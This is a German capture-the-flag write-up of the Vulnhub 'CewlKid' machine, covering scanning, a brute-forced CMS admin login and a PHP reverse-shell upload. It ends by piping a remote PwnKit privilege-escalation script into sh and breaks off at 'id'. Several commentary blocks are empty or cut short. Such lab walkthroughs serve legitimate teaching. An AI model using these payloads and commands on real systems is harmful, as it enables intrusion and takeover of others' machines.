CewlKid - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
cewl
Burpsuite
curl
grep
find
base64

Inhaltsverzeichnis

Reconnaissance

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.110 08:00:27:19:48:ae PCS Systemtechnik GmbH

Technische Analyse: `arp-scan` identifiziert Hosts im lokalen Netzwerk.

Kontextbezogene Bewertung: Ermittelt die IP-Adresse 192.168.2.110 mit zugehöriger MAC-Adresse.

Handlungsorientierte Empfehlungen: Für den Pentester: IP-Adresse für nachfolgende Scans notieren. Für den Systemadministrator: Netzwerkaktivitäten überwachen.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.110 cewlkid.vln

Technische Analyse: Konfiguration der `/etc/hosts`-Datei.

Kontextbezogene Bewertung: Hostname `cewlkid.vln` wird der IP-Adresse 192.168.2.110 zugewiesen.

Handlungsorientierte Empfehlungen: Für den Pentester: Hostnamen für einfachere Handhabung verwenden. Für den Systemadministrator: DNS-Konfiguration überprüfen.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 22:10 CET
Nmap scan report for cewlkid.vln (192.168.2.110)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PRT STATE SERVICE VERSION
22/tcp open ssh penSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:87:08:d7:ed:3a:9d:f6:be:91:7e:01:24:c8:74:c0 (RSA)
| 256 d6:22:68:01:2c:e2:c5:72:8e:1b:23:68:77:3e:10:7d (ECDSA)
|_ 256 bb:91:85:49:86:fd:af:66:42:a3:f4:12:90:a3:31:6a (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http nginx 1.18.0 (Ubuntu)
|_http-generator: Sitemagic CMS
|_http-title: Welcome - about us
|_http-server-header: nginx/1.18.0 (Ubuntu)
MAC Address: 08:00:27:19:48:AE (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel
TRACERUTE
HP RTT ADDRESS
1 0.12 ms cewlkid.vln (192.168.2.110)

Technische Analyse: Umfassender Nmap-Scan mit SYN-Scan, Standard-Skripten, Versionserkennung und Betriebssystemerkennung.

Kontextbezogene Bewertung: SSH (Port 22), HTTP (Port 80) und HTTP auf Port 8080 sind offen. Auf Port 80 läuft eine Standard-Nginx-Seite, während auf Port 8080 Sitemagic CMS läuft.

Handlungsorientierte Empfehlungen: Für den Pentester: Dienste auf Port 80 und 8080 untersuchen. Für den Systemadministrator: Unnötige Dienste schließen und Software aktuell halten.

Web Enumeration

┌──(root㉿CCat)-[~]
└─# nikto -h 192.168.2.110
- Nikto v2.5.0

+ Target IP: 192.168.2.110
+ Target Hostname: 192.168.2.110
+ Target Port: 80
+ Start Time: 2024-10-30 22:10:57 (GMT1)

+ Server: nginx/1.18.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-10-30 22:11:52 (GMT1) (55 seconds)

Technische Analyse: Nikto-Scan auf Port 80.

Kontextbezogene Bewertung: Fehlende Sicherheitsheader, veraltete Nginx-Version und eine gefundene `#wp-config.php#`-Datei, die Anmeldeinformationen enthalten könnte.

Handlungsorientierte Empfehlungen: Für den Pentester: Sicherheitsheader implementieren und Nginx aktualisieren. Existenz von `#wp-config.php#` untersuchen. Für den Systemadministrator: Schwachstellen beheben.

┌──(root㉿CCat)-[~]
└─# nikto -h http://192.168.2.110:8080
- Nikto v2.5.0

+ Target IP: 192.168.2.110
+ Target Hostname: 192.168.2.110
+ Target Port: 8080
+ Start Time: 2024-10-30 22:15:32 (GMT1)

+ Server: nginx/1.18.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie SMSESSIN6b631023323ea9ab created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html.
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /./: Cookie SMSESSIN875ccb7948453b2e created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /%2e/: Cookie SMSESSIN70e75ba9ce46f511 created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /%2f/: Cookie SMSESSIN2492266c0998ddfb created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ ///: Cookie SMSESSIN2e208863ccc9621d created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /license.txt: License file found may identify site software.
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8103 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2024-10-30 22:15:52 (GMT1) (20 seconds)

Technische Analyse: Nikto-Scan auf Port 8080.

Kontextbezogene Bewertung: Fehlende Sicherheitsheader, veraltete Nginx-Version, fehlendes httponly-Flag für Cookies, multiple Indexdateien, gefundene Lizenz- und Package-Dateien, `#wp-config.php#` gefunden und eine Readme-Datei.

Handlungsorientierte Empfehlungen: Für den Pentester: HTTPOnly-Flag für Cookies setzen, Veraltete Software aktualisieren, Lizenz und README Datei untersuchen. Für den Systemadministrator: Alle genannten Punkte beheben.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak -b '503,404,403' -e --no-error -k
http://192.168.2.110/index.html (Status: 200) [Size: 10918]

Technische Analyse: Gobuster-Scan auf dem Webserver.

Kontextbezogene Bewertung: Die Datei `index.html` wurde gefunden.

Handlungsorientierte Empfehlungen: Für den Pentester: Datei auf interessante Informationen untersuchen. Für den Systemadministrator: Sicherstellen, dass keine sensiblen Dateien öffentlich zugänglich sind.

Initial Access

┌──(root㉿CCat)-[~]
└─# webenum
---

Technische Analyse: Ein Kommentar zur Vorbereitung der anschließenden Web-Enumeration.

Kontextbezogene Bewertung: Bereitet die Umgebung vor.

Handlungsorientierte Empfehlungen: Für den Pentester: Weitere Schritte zur Aufzählung des Webservers durchführen. Für den Systemadministrator: Protokolle überprüfen.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110:8080/
Sitemagic CMS

Technische Analyse: Zugriff auf den Webserver auf Port 8080.

Kontextbezogene Bewertung: Sitemagic CMS läuft auf Port 8080.

Handlungsorientierte Empfehlungen: Für den Pentester: CMS-Version überprüfen und nach bekannten Schwachstellen suchen. Für den Systemadministrator: CMS aktuell halten.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110:8080/package.json
{
"name": "sitemagic",
"version": "3.4.0",
"description": "User friendly, feature rich, extendable, and customizable Content Management System",
"main": "index.php",
"dependencies": {
"fit-ui": "^1.0.15"
},
"devDependencies": {
"fit-ui": "^1.0.15"
},
"scripts": {
"test": 'echo "Error: no test specified" && exit 1'
},
"repository": {
"type": "git",
"url": "git+https://github.com/Jemt/SitemagicCMS.git"
},
"keywords": [
"Sitemagic",
"CMS"
],
"author": "Jimmy Thomsen",
"license": "SEE LICENSE IN license.txt",
"bugs": {
"url": "https://github.com/Jemt/SitemagicCMS/issues"
},
"homepage": "https://github.com/Jemt/SitemagicCMS#readme"
}

Technische Analyse: Anzeigen der Datei `package.json`.

Kontextbezogene Bewertung: Informationen über Sitemagic CMS Version 3.4.0.

Handlungsorientierte Empfehlungen: Für den Pentester: Nach Schwachstellen in Sitemagic CMS Version 3.4.0 suchen. Für den Systemadministrator: CMS aktuell halten.

┌──(root㉿CCat)-[~]
└─# view-source:http://192.168.2.110:8080/index.php?SMExt=SMPages&SMPagesId=5aa4268515e1ba8de6049a9cf0f59229
SMEventHandler.AddEventHandler(window, "load", smExternalModulesRegisterModule3805225);

function smExternalModulesRegisterModule3805225()
{
var moduleContainer = document.getElementById('SMExternalModulesModule3805225');

// Reason for registering iFrame as text instead of using DM method: See FrmSettings.class.php
// iFrame is registered using JavaScript to allow Strict HTML to validate when using external modules.
var module = "<" + "iframe src='//www.youtube.com/embed/ovDbNiRSYQI' width='100%' height='482' scrolling='no' frameBorder='0' style='' onload='' allowFullScreen='allowFullScreen' allowTransparency='true'>";
moduleContainer.innerHTML = module;

if (moduleContainer.firstChild.width = '100%')
moduleContainer.parentElement.style.width = '100%';
}

Technische Analyse: Quellcode der Seite anzeigen.

Kontextbezogene Bewertung: Ein iFrame zu YouTube wird eingebunden.

Handlungsorientierte Empfehlungen: Für den Pentester: Auf XSS-Möglichkeiten überprüfen. Für den Systemadministrator: Einbindung externer Ressourcen überprüfen.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110:8080/index.php?SMExt=../../../../../../../../../etc/passwd
An unhandled error occured

Security exception - value of $_GET['SMExt'] = '../../../../../../../../../etc/passwd' is in conflict with value restriction 'AlphaNumeric' and the following characters: .-_

Stack trace

#0 /var/www/example.com/html/base/SMEnvironment.class.php(156): SMEnvironmentgetValidatedValue()
#1 /var/www/example.com/html/base/SMExtensionManager.class.php(262): SMEnvironmentGetQueryValue()
#2 /var/www/example.com/html/extensions/SMPages/Main.class.php(27): SMExtensionManagerGetExecutingExtension()
#3 /var/www/example.com/html/base/SMController.class.php(462): SMPages->Init()
#4 /var/www/example.com/html/base/SMController.class.php(128): SMController->autoExecuteExtensions()
#5 /var/www/example.com/html/index.php(27): SMController->Execute()
#6 {main}

Technische Analyse: Versuch, die Datei `/etc/passwd` über eine Directory Traversal-Schwachstelle auszulesen.

Kontextbezogene Bewertung: Der Versuch wird durch eine Sicherheitsmaßnahme verhindert, die die Eingabe validiert.

Handlungsorientierte Empfehlungen: Für den Pentester: Andere Parameter suchen, die anfällig für Directory Traversal sind. Für den Systemadministrator: Eingabevalidierung implementieren.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110/
Ubuntu Logo Apache2 Ubuntu Default Page
It works!

This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.html) before continuing to operate your HTTP server.

If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.

Technische Analyse: Aufrufen der Standard-Apache-Seite.

Kontextbezogene Bewertung: Standardseite ohne besondere Informationen.

Handlungsorientierte Empfehlungen: Für den Pentester: Keine weitere Aktion erforderlich. Für den Systemadministrator: Standardseite durch eigene Inhalte ersetzen.

Initial Access

┌──(root㉿CCat)-[~]
└─# gobuster
http://192.168.2.110:8080/index.html (Status: 200) [Size: 152]
http://192.168.2.110:8080/images (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/images/]
http://192.168.2.110:8080/index.php (Status: 200) [Size: 8178]
http://192.168.2.110:8080/templates (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/templates/]
http://192.168.2.110:8080/files (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/files/]
http://192.168.2.110:8080/data (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/data/]
http://192.168.2.110:8080/sites (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/sites/]
http://192.168.2.110:8080/license.txt (Status: 200) [Size: 2452]
http://192.168.2.110:8080/upgrade.php (Status: 500) [Size: 91]
http://192.168.2.110:8080/changelog.txt (Status: 200) [Size: 31371]
http://192.168.2.110:8080/extensions (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/extensions/]
http://192.168.2.110:8080/base (Status: 301) [Size: 178] [--> http://192.168.2.110:8080/base/]
http://192.168.2.110:8080/package.json (Status: 200) [Size: 709]
http://192.168.2.110:8080/tables.sql (Status: 200) [Size: 6237]
http://192.168.2.110:8080/metadata.xml (Status: 200) [Size: 575]

Technische Analyse: Gobuster-Scan auf Port 8080.

Kontextbezogene Bewertung: Die Struktur der Webanwendung wird offenbart.

Handlungsorientierte Empfehlungen: Für den Pentester: Scanergebnisse auswerten, um weitere Angriffspunkte zu identifizieren. Für den Systemadministrator: Zugriff auf sensitive Dateien beschränken.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110:8080/metadata.xml











Technische Analyse: Anzeigen der Datei `metadata.xml`.

Kontextbezogene Bewertung: Enthält Metadaten über das CMS, einschließlich Version 4.4.2.

Handlungsorientierte Empfehlungen: Für den Pentester: Nach bekannten Schwachstellen in Sitemagic CMS 4.4.2 suchen. Für den Systemadministrator: CMS aktuell halten.

┌──(root㉿CCat)-[~]
└─# http://192.168.2.110:8080/upgrade.php
The ZIP extension for PHP is required but not loaded - please contact your hosting provider

Technische Analyse: Aufruf von `upgrade.php` führt zu einer Fehlermeldung.

Kontextbezogene Bewertung: Das System benötigt die ZIP-Erweiterung für PHP.

Handlungsorientierte Empfehlungen: Für den Pentester: Dies deutet auf eine nicht vollständig konfigurierte Installation hin. Für den Systemadministrator: ZIP-Erweiterung installieren.

┌──(root㉿CCat)-[~]
└─# cewl http://192.168.2.110:8080 > cewl.txt
---

Technische Analyse: Verwendung von CEWL, um Wörter von der Website zu extrahieren.

Kontextbezogene Bewertung: CEWL generiert eine Wortliste, die für Brute-Force-Angriffe verwendet werden kann.

Handlungsorientierte Empfehlungen: Für den Pentester: Die generierte Wortliste für Brute-Force verwenden. Für den Systemadministrator: Starke Passwörter verwenden.

┌──(root㉿CCat)-[~]
└─# mv cewl.txt /home/ccat/Downloads
---

Technische Analyse: Verschieben der generierten Datei.

Kontextbezogene Bewertung: Standardschritt.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# wc -l /home/ccat/Downloads/cewl.txt
201 /home/ccat/Downloads/cewl.txt

Technische Analyse: Zählen der Zeilen in der generierten Datei.

Kontextbezogene Bewertung: Es wurden 201 Wörter gefunden.

Handlungsorientierte Empfehlungen: Für den Pentester: Die Wortliste ist bereit für Angriffe. Für den Systemadministrator:

Initial Access

┌──(root㉿CCat)-[~]
└─# Burpsuite Request
PST /index.php?SMExt=SMLogin HTTP/1.1
Host: 192.168.2.110:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
rigin: http://192.168.2.110:8080
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.110:8080/index.php?SMExt=SMLogin
Cookie: SMSESSIN6b631023323ea9ab=pak4mvif9o8slseq99p5hdvoet
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Priority: u=0, i

SMInputSMLoginUsername=admin&SMInputSMLoginPassword=§pass§&SMptionListSMLoginLanguages%5B%5D=en&SMInputSMSearchValue8477222=&SMPostBackControl=SMLinkButtonSMLoginSubmit&SMRequestToken=1a79276eaa21c8b7a4763b49d92945c1

Technische Analyse: HTTP-Anfrage für den Login-Bereich.

Kontextbezogene Bewertung: Versuch, sich als Admin anzumelden, um Zugriff auf die Seite zu erhalten.

Handlungsorientierte Empfehlungen: Für den Pentester: Anmeldung als Admin prüfen. Für den Systemadministrator: Beschränken Sie die Anmeldeversuche.

┌──(root㉿CCat)-[~]
└─# Response:
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 30 ct 2024 22:20:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: index.php?SMExt=SMAnnouncements
Content-Length: 0

Technische Analyse: HTTP 302 Weiterleitung.

Kontextbezogene Bewertung: Der Login war erfolgreich und weitergeleitet zu Announcements.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# curl Anmeldeinformationen
curl --path-as-is -i -s -k -X $'PST' \
-H $'Host: 192.168.2.110:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: de,en-US;q=0.7,en;q=0.3' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 219' -H $'rigin: http://192.168.2.110:8080' -H $'DNT: 1' -H $'Connection: keep-alive' -H $'Referer: http://192.168.2.110:8080/index.php?SMExt=SMLogin' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-GPC: 1' -H $'Priority: u=0, i' \
-b $'SMSESSIN6b631023323ea9ab=pak4mvif9o8slseq99p5hdvoet' \
--data-binary $'SMInputSMLoginUsername=admin&SMInputSMLoginPassword=Letraset&SMptionListSMLoginLanguages%5B%5D=en&SMInputSMSearchValue8477222=&SMPostBackControl=SMLinkButtonSMLoginSubmit&SMRequestToken=1a79276eaa21c8b7a4763b49d92945c1' \
$'http://192.168.2.110:8080/index.php?SMExt=SMLogin'

admin:Letraset

Technische Analyse: Erfolgreicher Login mit curl.

Kontextbezogene Bewertung: Admin:Letraset - erfolgreiche Anmeldedaten.

Handlungsorientierte Empfehlungen: Für den Pentester: Mit den Anmeldedaten anmelden und Rechte prüfen. Für den Systemadministrator: Admin Passwort ändern.

Initial Access

┌──(root㉿CCat)-[~]
└─# Request: revshell
PST /index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: 192.168.2.110:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=209267091420893491361662753385
Content-Length: 6015
rigin: http://192.168.2.110:8080
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.110:8080/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Cookie: SMSESSIN6b631023323ea9ab=pak4mvif9o8slseq99p5hdvoet
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Priority: u=4

--209267091420893491361662753385
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell2.php"
Content-Type: application/x-php

set_time_limit (0);
$VERSIN = "1.0";
$ip = '192.168.2.199'; // CHANGE THIS
$port = 9001; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Technische Analyse: Reverse Shell Anforderung durch Upload einer PHP Datei.

Kontextbezogene Bewertung: Hier wird versucht.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 30 ct 2024 22:32:48 GMT
Content-Type: text/html; charset=windows-1252
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2518

Basic TPLTemplateSMSunrise2017 TPLImageThemeDefault SMIntegratedExtension"
input id="SMPostBackControl" type="hidden"

Technische Analyse: Erfolgreicher Response

Kontextbezogene Bewertung:

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

Initial Access

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...

Technische Analyse: Netcat Listen

Kontextbezogene Bewertung: Bereit für die Reverse Shell

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

Initial Access

┌──(root㉿CCat)-[~]
└─# 192.168.2.110:8080/files/images/shell2.php

Technische Analyse: Zugriff auf hochgeladene Reverse Shell.

Kontextbezogene Bewertung: Auslösen der Reverse Shell.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.110] 55404
Linux cewlkid 5.4.0-47-generic #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
22:36:27 up 1:27, 0 users, load average: 0.00, 0.00, 0.04
USER TTY FRM LGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Technische Analyse: Erfolgreiche Reverse-Shell-Verbindung.

Kontextbezogene Bewertung: Zugriff als www-data erhalten.

Handlungsorientierte Empfehlungen: Für den Pentester: System erkunden. Für den Systemadministrator: Auslöser untersuchen.

Privilege Escalation

┌──(root㉿CCat)-[~]
└─# find / -type f -perm -u=s -ls 2>/dev/null
7674425 129 -rwsr-xr-x 1 root root 131832 Sep 15 2023 /snap/snapd/20290/usr/lib/snapd/snap-confine
193650 43 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /snap/core18/1885/bin/mount
193659 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1885/bin/ping
193675 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1885/bin/su
193693 27 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /snap/core18/1885/bin/umount
193848 75 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1885/usr/bin/chfn
193850 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1885/usr/bin/chsh
193902 75 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
193966 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1885/usr/bin/newgrp
193978 59 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1885/usr/bin/passwd
194069 146 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1885/usr/bin/sudo
194156 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
194466 427 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
7674737 43 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/2846/bin/mount
7674746 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2846/bin/ping
7674762 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /snap/core18/2846/bin/su
7674780 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/2846/bin/umount
7674917 75 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /snap/core18/2846/usr/bin/chfn
7674919 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /snap/core18/2846/usr/bin/chsh
7674972 75 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /snap/core18/2846/usr/bin/gpasswd
7675036 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /snap/core18/2846/usr/bin/newgrp
7675049 59 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /snap/core18/2846/usr/bin/passwd
7675140 146 -rwsr-xr-x 1 root root 149080 Apr 4 2023 /snap/core18/2846/usr/bin/sudo
7675228 42 -rwsr-xr-- 1 root systemd-resolve 42992 Oct 25 2022 /snap/core18/2846/usr/lib/dbus-1.0/dbus-daemon-launch-helper
7675538 427 -rwsr-xr-x 1 root root 436552 Mar 30 2022 /snap/core18/2846/usr/lib/openssh/ssh-keysign
251808 84 -rwsr-xr-x 1 root root 85064 Feb 6 2024 /snap/core20/2434/usr/bin/chfn
251814 52 -rwsr-xr-x 1 root root 53040 Feb 6 2024 /snap/core20/2434/usr/bin/chsh
251884 87 -rwsr-xr-x 1 root root 88464 Feb 6 2024 /snap/core20/2434/usr/bin/gpasswd
251968 55 -rwsr-xr-x 1 root root 55528 Apr 9 2024 /snap/core20/2434/usr/bin/mount
251977 44 -rwsr-xr-x 1 root root 44784 Feb 6 2024 /snap/core20/2434/usr/bin/newgrp
251992 67 -rwsr-xr-x 1 root root 68208 Feb 6 2024 /snap/core20/2434/usr/bin/passwd
252102 67 -rwsr-xr-x 1 root root 67816 Apr 9 2024 /snap/core20/2434/usr/bin/su
252103 163 -rwsr-xr-x 1 root root 166056 Apr 4 2023 /snap/core20/2434/usr/bin/sudo
252161 39 -rwsr-xr-x 1 root root 39144 Apr 9 2024 /snap/core20/2434/usr/bin/umount
7688878 32 -rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
1183938 48 -rwsr-xr-x 1 root root 48200 Aug 29 2019 /usr/sbin/mount.cifs

Technische Analyse: SUID-Dateien werden gelistet.

Kontextbezogene Bewertung: Hinweis auf Binarys.

Handlungsorientierte Empfehlungen: Für den Pentester: pkexec ausnutzen. Für den Systemadministrator: Rechte überprüfen.

┌──(root㉿CCat)-[~]
└─# www-data@cewlkid:/$ /usr/bin/pkexec /bin/sh
AUTHENTICATING FR org.freedesktop.policykit.exec = Authentication is needed to run `/bin/sh' as the super user Authenticating as: admin (kidcewl) Password:

Technische Analyse: Hier wird zur Rechteausweitung `/usr/bin/pkexec /bin/sh` verwendet.

Kontextbezogene Bewertung: Funktioniert nur mit dem Passwort des Users.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# www-data@cewlkid:/$ curl
curl: try 'curl --help' or 'curl --manual' for more information

Technische Analyse: Curl wird nicht gefunden.

Kontextbezogene Bewertung: Es kann nichts von aussen geladen werden, da Curl nicht installiert ist.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

Privilege Escalation

┌──(root㉿CCat)-[~]
└─# grep -r -i '.txt' ./
┌──(root㉿CCat)-[~]
└─# find ./ -name *.txt 2>/dev/null
./zerocewl/data/cfiles.txt
./zerocewl/data/boot_hooks.txt
./zerocewl/data/docker_tags.txt
./zerocewl/data/docker_packages.txt
./zerocewl/data/simcity.txt
./zerocewl/data/bootlog.txt
./zerocewl/data/os_releases.txt
./zerocewl/data/packages.txt
./zerocewl/data/composer.txt
./zerocewl/About.txt
./zerocewl/note.txt

Technische Analyse: Suchen nach Dateien die auf txt enden.

Kontextbezogene Bewertung: Es gibt eine Reihe interessanter txt Dateien

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# cd /home/
cd /home/

Technische Analyse: Wechsel ins Homeverzeichnis

Technische Analyse: Liste der vorhandenen Ordner

Kontextbezogene Bewertung: Es gibt eine Reihe interessanter User Ordner.

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# ls -la
total 28
drwxr-xr-x 7 root root 4096 Sep 10 2020 .
drwxr-xr-x 21 root root 4096 Sep 9 2020 ..
drwx 2 cewlbeans cewlbeans 4096 Sep 9 2020 cewlbeans
drwx 3 ipsum ipsum 4096 Sep 9 2020 ipsum
drwx 5 kidcewl kidcewl 4096 Sep 9 2020 kidcewl
drwx 3 lorem lorem 4096 Sep 9 2020 lorem
drwx 8 zerocewl zerocewl 4096 Sep 10 2020 zerocewl

Technische Analyse: Auflistung der Ordner im Home-Verzeichnis.

Kontextbezogene Bewertung: Ordner cewlbeans, ipsum, kidcewl, lorem und zerocewl gefunden

Handlungsorientierte Empfehlungen: Für den Pentester: Überprüfen ob es in einen der User Ordner eine Flag zu finden gibt Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
---

Technische Analyse: PwnKit wird geladen

Kontextbezogene Bewertung:

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# id
